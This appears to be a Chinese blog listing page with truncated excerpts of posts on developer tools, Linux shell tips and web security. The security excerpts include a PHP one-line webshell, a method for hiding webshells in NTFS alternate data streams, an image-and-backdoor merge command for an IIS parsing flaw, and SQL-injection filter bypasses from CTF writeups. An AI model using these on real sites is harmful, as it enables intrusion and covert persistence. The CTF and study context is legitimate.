myBatis 反向生成工具,MyBatis Generator(这个是我看到最好的回答,没有之一)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE generatorConfiguration
PUBLIC "-//mybatis.org//DTD MyBatis Generator Configuration 1.0//EN"
"http://mybatis.org/dtd/mybatis-g...
GitHub Pages 绑定域名
第一步 创建一个仓库
命名方式为 账号 + .github.io ,例如我的仓库名为:mengxianliang.github.io
第二步 在仓库里添加CNAME文件
有两总方式:
第一种:在仓库里添加一个文件,命名为 CNAME,文件名大写且没有后缀;文件里填写要绑定的域名且不要包含Http://和www
第二种:进入设置,找到 Custom domain添加域名后保存即可
...
【Hexo】Hexo+Github构建个人博客 (三):添加皮肤主题
一、选择主题
选择你自己喜欢的主题
参考:
1.Hexo官网主题
2.知乎:有哪些好看的 Hexo 主题?
二、配置主题
1.我选择了hexo-theme-yilia这个主题,简洁大方,功能齐全;
这是他的地址:https://github.com/litten/hexo-theme-yilia
2.具体添加方法:
安装
git clone https://github....
CVE-2018-12613 PhpMyadmin后台文件包含分析
2018年6月19日,phpmyadmin在最新版本修复了一个严重级别的漏洞.
描述:
一个攻击者可以在服务器上包含(查看和潜在执行)文件的漏洞被发现。
该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。
攻击者必须经过身份验证,但在这些情况下除外:
$ cfg ['AllowArbitraryServer'] = true:攻击者...
【web端权限维持】利用ADS隐藏webshell
0X01 前言
未知攻,焉知防,在web端如何做手脚维护自己拿到的权限呢?首先要面临的是webshell查杀,那么通过利用ADS隐藏webshell,不失为一个好办法。
0X02 利用ADS隐藏webshell
关于ADS的介绍,就不再阐述,详见尾部参考资料。
PHP 一句话木马:<?php @eval($_POST['chopper']);?>,当然也可以直接制作...
“百度杯”CTF比赛 九月场 SQL-writeup
这题自己的收获:用<>隔开敏感字符,绕过防注入
题目界面:
刚开始还是老规矩输入and 1=1 发现被拦截 此外 测试了or 发现也进行了拦截
我们可以用下面的字符来替换 and 和 or
and---->&& , or-----> ||
替换后发现可以成功绕过
接下来进行猜字段长度 发...
“百度杯”CTF比赛 九月场 类型:Web 题目名称:SQLi
收获的知识:
重定向一般发生在访问域名而且不加参数或者文件夹名,文件名这样的情况下
sql注入也要留意HTTP信息的变化
可以利用SQL map跑一下看看有没有有用的信息
不使用单引号和逗号的注入的注入技巧
发现页面空白 然后查看源文件 发现另一个页面
进去后出现
后来手测和用sqlmap跑感觉这不是一个注入点
看了别人的writeup之后发现...
“百度杯”CTF比赛 十月场 -------Login
=============================================================
个人收获:
1.多观察网页的源代码
2.多留意http的访问信息
3.多留意http头参数的变化
4.收获了unserialize,gzuncompress参数的认识
================================================...
“百度杯”CTF比赛 九月场-----Test
=========================================
个人收获:
1.连接shell 失败的时候可以试试多个版本的菜刀,可能是菜刀的问题
2.学会了菜刀数据库管理的配置
============================================
题目界面:
这个是个cms,我就直接百度查询到现成的漏洞
漏洞地址:http://0day5...
IIS7&7.5解析漏洞
IIS7/7.5在Fast-CGI运行模式下,在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。
常用利用方法:将一张图和一个写入后门代码的文本文件合并将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾
e.g. copy xx.jpg/b + yy.txt/a xy.jpg
#############...
CVE-2014-4113本地提权测试
CVE-2014-4113本地提权漏洞分析
By Netfairy
前言
2014年10月14日, Crowdstrike和FireEye发表了一篇文章, 描述了一个新的针对Windows的提权漏洞. Crowdstrike的文章表明:这一新漏洞是在追踪一个高度先进攻击团队飓风熊猫(HURRICANE PANDA)发现的, 这之前, 飓风熊猫利用此漏洞进行攻击已至少五个月了.原文http:/...
上传漏洞的另类突破姿势(针对Linux)
===========================================
个人收获:
1.在Linux系统下上传文件可以尝试通过111.php.jpg的格式绕过上传限制
===========================================
昨晚培训的时候遇到一个客户站,这个站的上传比较有意思,于是就突破一下看...
sqlmap之POST注入的两种姿势(-r 和--data)
用sqlmap进行做post注入测试的时候,发现这么一种情况:
对POST请求,之前一直用 “-r txt文件”的形式,进行注入测试;
发现还有另一种POST,用“-r txt文件”的形式进行却无效,原来可以通过“--data="key=value"”来进行测试注入。
故以上两种情况都是post的,却还是有区别的
故此记录如下:
1:POST注入时,什么时候用“-r txt文...
2017年全国大学生信息安全竞赛---wanna to see your hat?
======================================
个人收获:
1.SQL注入语句中用/**/代替空格 (虽然之前就知道)
=========================================
题目界面:
常规的点击连接查看页面看到接下来几个页面
没有什么特别的发现,...
Linux学习之高级键盘操作技巧
1.移动光标
按键
行动
Ctrl-a
移动光标到行首。
Ctrl-e
移动光标到行尾。
Ctrl-f
光标前移一个字符;和右箭头作用一样。
Ctrl-b
光标后移一个字符;和左箭头作用一样。
Alt-f
光标前移一个字。
Alt-b
光标后移一个字。
Ctrl-l
清空屏幕,移动光标到左上角。c...
Linux学习之(shell展开)
1.shell展开
1.1shell展开的几种方式
~(波浪线展开) cd 等命令使用 ,效果为回到主目录等
字符展开 , 显示字符,如果使用通配符或者正则表达式结合命令进行展开,显示字符或者显示目录下的文件(ls)
路径名展开, 使用通配符或者正则表达式结合命令进行展开,显示目录下的文件(ls)
花括号展开 将花括号中的内容挨个和外面的内容结合 例: echo a{A,B,C}a 将出...
Linux的shell环境
shell 在 shell 会话中维护着大量的信息,这些信息称为 (shell) 环境。 存储在
shell 环境中的数据被程序用来确定配置属性。然而大多数程序用配置文件来存储程序设置, 某些程序也会查找存储在shell 环境中的数值来调整他们的行为,所以可以用shell环境来定制shell经历.
1.shell存放两种基本类型的数据, 环境变量 和 shell变量...
eclipse用Maven构建SpringMVC环境报错找不到springmvc包下的Dispatcher类
java.lang.ClassNotFoundException: org.springframework.web.servlet.Dispatcher
今天使用eclipse创建spring项目,结果一直是出现找不到类,配置没有问题,而且jar也没少,换了几个版本都不行,然后去搜了一下,发现是eclipse的问题,发现WEB-INF下根本没有lib文件夹…
有个叫“Deployment As...
今日推荐
周排行